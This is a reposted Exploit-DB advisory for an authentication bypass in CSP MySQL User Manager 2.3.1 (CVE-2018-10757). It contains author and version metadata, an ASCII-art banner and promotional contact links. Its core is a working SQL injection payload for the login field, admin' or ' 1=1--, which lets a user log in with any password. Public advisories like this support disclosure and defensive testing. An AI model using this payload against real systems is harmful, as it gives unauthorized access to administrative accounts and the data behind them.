CSP MySQL User Manager 2.3.1 – Authentication Bypass - 体验盒子

作者： Youssef Mami
日期： 2018-05-06
类别：
webapps
平台：
linux
来源：https://www.exploit-db.com/exploits/44589/
# Exploit Title: CSP MySQL User Manager 2.3.1 - Authentication Bypass
# Date: 2018-05-04
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/archive/p/cspmum/
# Software Link: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
# Version: 2.3.1
# Tested on: Linux 2.6.38-11
# CVE : CVE-2018-10757

##################################################################################
.____ 
||__ __________ _____ __________ _____/|_ 
||\\__\/ \ / \\__\/ \_/ __ \ __\
| Y\/ __ \|Y Y\Y Y\/ __ \|Y Y\___/||
|___|(____/__|_|/__|_|(____/__|_|/\___>__|
 \/ \/\/\/ \/\/ \/
._________.__
|__| _____/ ____\________________ _____ _/|_|__| ________ __ ____
||/\ __\/_ \___ \/ \\__\\ __\|/ ____/|\_/ __ \ 
|| |\| (<_> )| \/Y Y\/ __ \|| |< <_|||/\___/ 
|__|___|/__|\____/|__||__|_|(____/__| |__|\__ |____/\___>
\/\/ \/|__| \/ 
.__ 
______ _______________|__| ________ ______
 /___// __ \___ \\/ /|/ ___\/ __ \ /___/
 \___ \\___/|| \/\ /|\\__\___/ \___ \ 
/____>\___>__|\_/ |__|\___>___>____>
 \/ \/\/\/ \/ 

 
##################################################################################
SQL Injection Authentication Bypass
Product Page: https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/cspmum/cmum-231.zip
 
Author(Pentester): Youssef mami (contact@hammamet-services.com)
On Web: www.hammamet-services.com and http://hiservices.blogspot.com ( our blog )
On Social: www.facebook.com/hammamet.informatique and https://twitter.com/hammamet_info
##################################################################################
we just need to input admin login like this : admin' or ' 1=1-- and any password :-) 
login : admin' or ' 1=1--
password: hammamet informatique services